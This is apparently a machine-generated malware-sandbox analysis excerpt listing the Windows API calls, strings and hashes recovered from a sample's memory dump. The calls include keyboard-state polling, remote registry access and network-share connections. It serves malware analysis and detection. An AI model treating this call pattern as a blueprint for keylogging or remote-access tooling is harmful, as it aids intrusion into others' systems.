                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,00E70D31,00000001), ref: 00E8A09A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00E70D31,00000001,0000138C,00000001,00000000,00000001,?,00E9EEAE,00EF2430,?), ref: 00E8A0BC
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,00E70D31,00000001), ref: 00E8A0BF
                                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E8A1E0
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                                    • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6d430bff8cbb34bfb538c3d073ec2a882479298c5127c07776bd46d63e7dff99
                                                                                                                                                                                                                                                                                                    • Instruction ID: d8c2ecf74f6095fe86e5249e5a1eacae832a1abfa18d4a4c9c934de9b19577ca
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d430bff8cbb34bfb538c3d073ec2a882479298c5127c07776bd46d63e7dff99
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B341407280022DAADF15FBE0ED46DEEB7B8AF18300F502165F505B6092EB756F49CB61
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E28577: _wcslen.LIBCMT ref: 00E2858A
                                                                                                                                                                                                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E81093
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E810AF
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E810CB
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E810F5
                                                                                                                                                                                                                                                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00E8111D
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E81128
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E8112D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                                    • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                                    • Opcode ID: dabf04fa0632c3097e65f180306843260e00bca53b62e31717241110145e6c4d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6a8f6198e6337901d4cdb73fdd5445ebc748bd8e0491ad9259bf35d86ccf7ad7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dabf04fa0632c3097e65f180306843260e00bca53b62e31717241110145e6c4d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2941F672C1022DAFDF21EBA4EC85DEEB7B8BF14750F405169E905B61A1EB319E09CB50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EB4AD9
                                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00EB4AE0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EB4AF3
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00EB4AFB
                                                                                                                                                                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EB4B06
                                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00EB4B10
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00EB4B1A
                                                                                                                                                                                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00EB4B30
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00EB4B3C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1a07d7564ef14f0e2020837d07ae77413066eb14ae19244927e088b99931eeaa
                                                                                                                                                                                                                                                                                                    • Instruction ID: d8463fad114fb3d7ed607881680f06ab1ff805ea4f521308b9d3099275fe5911
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a07d7564ef14f0e2020837d07ae77413066eb14ae19244927e088b99931eeaa
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9315872105219AFDF129FA5DC48FDB3BA9EF09368F110311FA14B61A0D735D854DB94
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00E8D1BE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconLoad
                                                                                                                                                                                                                                                                                                    • String ID: \+$\+$`+$blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                                    • API String ID: 2457776203-3382907240
                                                                                                                                                                                                                                                                                                    • Opcode ID: 973ae58518ef86fc6fce450cd6b19e4a02b443bbaab188c948689bfa37360b56
                                                                                                                                                                                                                                                                                                    • Instruction ID: 88f916b739c7b222913adb21112caadfb023c41a540dc840dcb810dc071a67af
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 973ae58518ef86fc6fce450cd6b19e4a02b443bbaab188c948689bfa37360b56
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1011293574E70ABEE7056B55EC86EAE77EC9F05764B20202AF90CB61C1E7B4AE404760
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00EA46B9
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00EA46E7
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00EA46F1
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EA478A
                                                                                                                                                                                                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00EA480E
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EA4932
                                                                                                                                                                                                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00EA496B
                                                                                                                                                                                                                                                                                                    • CoGetObject.OLE32(?,00000000,00EC0B64,?), ref: 00EA498A
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00EA499D
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EA4A21
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00EA4A35
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 429561992-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00E98538
                                                                                                                                                                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E985D4
                                                                                                                                                                                                                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00E985E8
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00EC0CD4,00000000,00000001,00EE7E8C,?), ref: 00E98634
                                                                                                                                                                                                                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E986B9
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00E98711
                                                                                                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00E9879C
                                                                                                                                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E987BF
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00E987C6
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00E9881B
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00E98821
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E8039F
                                                                                                                                                                                                                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00E803F8
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00E8040A
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E8042A
                                                                                                                                                                                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00E8047D
                                                                                                                                                                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E80491
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00E804A6
                                                                                                                                                                                                                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00E804B3
                                                                                                                                                                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E804BC
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00E804CE
                                                                                                                                                                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E804D9
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00E8A65D
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00E8A6DE
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00E8A6F9
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00E8A713
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00E8A728
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00E8A740
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00E8A752
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00E8A76A
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00E8A77C
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00E8A794
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00E8A7A6
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c7af297ff814dd90834b6c9b78d996b70e20766e7b6662ec1d4275f5dfeea776
                                                                                                                                                                                                                                                                                                    • Instruction ID: c641fe5646f1430024883cf5d23ed2aa3077c835cc6caec1077be5f906bea75c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7af297ff814dd90834b6c9b78d996b70e20766e7b6662ec1d4275f5dfeea776
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 304196645047C96EFF31666088043A5BEB06B1134CF0CA17BD5CE7A5C2FB9599C8D753
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                                    • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6bd2d07372c74856a3fb1f28bb115364f10dd90af3690a812bbce11bc50a3c8e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 24dd99d0d3cc245a30c3bef0de2371b18a29e64780446cdf8eeff6ba731ee802
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6bd2d07372c74856a3fb1f28bb115364f10dd90af3690a812bbce11bc50a3c8e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB51E731A00516ABCF14DF68C9415BEB3E5BF5A364B206229F466FB286DB35ED40C790
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32 ref: 00EA41D1
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00EA41DC
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00EC0B44,?), ref: 00EA4236
                                                                                                                                                                                                                                                                                                    • IIDFromString.OLE32(?,?), ref: 00EA42A9
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00EA4341
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00EA4393
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                                    • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2a65dc4dbee35c6256749acef26a0e77c7d93d908b92946e4394e9035ca3574d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 75a7cf5484dc6ece0c53da3cd0da11c44b9e762f9ce316851ee4189bfaabc2e5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a65dc4dbee35c6256749acef26a0e77c7d93d908b92946e4394e9035ca3574d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E861A1B1608301DFC710DF65D849B5ABBE4AF8A714F001919F585AB2A1D7B0FD48CBA2
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00E98C9C
                                                                                                                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E98CAC
                                                                                                                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E98CB8
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E98D55
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E98D69
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E98D9B
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E98DD1
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E98DDA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E639E2,00000004,00000000,00000000), ref: 00E3FC41
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00E639E2,00000004,00000000,00000000), ref: 00E7FC15
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E639E2,00000004,00000000,00000000), ref: 00E7FC98
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ShowWindow
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateMenu.USER32 ref: 00EB4715
                                                                                                                                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00EB4724
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EB47AC
                                                                                                                                                                                                                                                                                                    • IsMenu.USER32(?), ref: 00EB47C0
                                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00EB47CA
                                                                                                                                                                                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EB47F7
                                                                                                                                                                                                                                                                                                    • DrawMenuBar.USER32 ref: 00EB47FF
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                                    • String ID: 0$F
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E84620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00E828B1
                                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 00E828BC
                                                                                                                                                                                                                                                                                                    • GetParent.USER32 ref: 00E828D8
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E828DB
                                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00E828E4
                                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00E828F8
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E828FB
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E84620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00E82990
                                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 00E8299B
                                                                                                                                                                                                                                                                                                    • GetParent.USER32 ref: 00E829B7
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E829BA
                                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00E829C3
                                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00E829D7
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E829DA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                                    • Opcode ID: a3e1384393611dda217f55625d96e33d184dd27d8f5a47e8255ad2b3e98d22d2
                                                                                                                                                                                                                                                                                                    • Instruction ID: f6f7038dd6fd9be2f01a304fc004eb58e9faa6835a474ee3d0b1dcde89279710
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3e1384393611dda217f55625d96e33d184dd27d8f5a47e8255ad2b3e98d22d2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C21CF75900218BFCF05ABA0DC85EEEBBB8EF04340F005156FA59B71A5DB755818DB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EB4539
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EB453C
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EB4563
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EB4586
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EB45FE
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00EB4648
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00EB4663
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00EB467E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00EB4692
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00EB46AF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
